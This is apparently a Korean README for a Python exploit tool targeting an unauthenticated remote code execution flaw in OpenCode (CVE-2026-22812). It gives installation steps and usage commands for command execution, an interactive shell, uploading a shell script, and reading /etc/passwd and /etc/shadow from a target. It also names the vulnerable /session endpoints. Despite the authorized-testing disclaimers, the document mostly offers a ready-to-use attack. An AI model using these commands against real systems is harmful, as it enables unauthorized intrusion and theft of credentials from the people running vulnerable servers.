
Python 기반 OpenCode RCE(CVE-2026-22812) 익스플로잇 도구로, 명령 실행, 파일 읽기/쓰기/업로드/다운로드, 그리고 승인된 침투 테스트를 위한 대화형 셸을 제공합니다.
v1.0.216 미만 버전에 영향을 미치는 OpenCode 원격 코드 실행(RCE) 취약점을 위한 Python 공격 도구입니다. 이 도구는 명령 실행, 파일 읽기/쓰기, 파일 업로드/다운로드, 대화형 셸 등 여러 공격 벡터를 제공합니다.
⚠️ 승인된 테스트 전용 ⚠️
# 저장소 복제
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# 의존성 설치
pip install requests urllib3
# 실행 권한 부여 (선택 사항)
chmod +x CVE-2026-22812.py
requests 라이브러리urllib3 라이브러리python3 CVE-2026-22812.py -t http://target:port [options]
# 대상이 취약한지 확인
python3 exploit.py -t http://10.0.0.1:4096 --check
# 대화형 셸
python3 exploit.py -t http://10.0.0.1:4096 -i
# 단일 명령 실행
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# 파일 읽기
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# 파일 업로드
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# 파일 다운로드
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# 시스템 정보 확인
python3 exploit.py -t http://10.0.0.1:4096 --info
# 프록시 사용 (Burp Suite 등)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
대화형 셸(-i 플래그)에 진입하면 다음을 사용할 수 있습니다:
<command> 셸 명령 실행
help 도움말 메뉴 표시
exit 셸 종료
session 세션 ID 표시
stats 공격 통계 표시
read <file> 파일 내용 읽기
download <remote> <local> 파일 다운로드
upload <local> <remote> 파일 업로드
sysinfo 시스템 정보 확인
이 취약점은 세션 관리 엔드포인트(/session)에 존재하며, 인증되지 않은 사용자가 세션을 생성하고 /session/{id}/shell 엔드포인트를 통해 임의 명령을 실행할 수 있습니다.
POST /session - 세션 생성POST /session/{id}/shell - 명령 실행GET /file/content - 파일 읽기CVE-2026-22812.py
├── Colors 클래스 (ANSI 색상 코드)
├── print_banner() (배너 표시)
├── Exploit 클래스 (주요 공격 로직)
│ ├── __init__() (초기화)
│ ├── check_vuln() (취약점 확인)
│ ├── create_session() (세션 생성)
│ ├── exec_cmd() (명령 실행)
│ ├── read_file() (파일 읽기)
│ ├── write_file() (파일 쓰기)
│ ├── upload() (파일 업로드)
│ ├── download() (파일 다운로드)
│ ├── get_info() (시스템 정보)
│ ├── shell() (대화형 셸)
│ └── 헬퍼 메서드
└── main() (인자 파싱)
이 도구는 교육 목적으로만 배포됩니다. 사용에 따른 책임은 사용자 본인에게 있습니다.
문제 및 질문이 있는 경우: